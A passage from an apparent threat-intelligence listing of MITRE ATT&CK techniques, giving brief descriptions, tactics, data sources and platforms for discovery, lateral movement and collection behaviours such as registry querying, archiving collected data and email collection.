Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre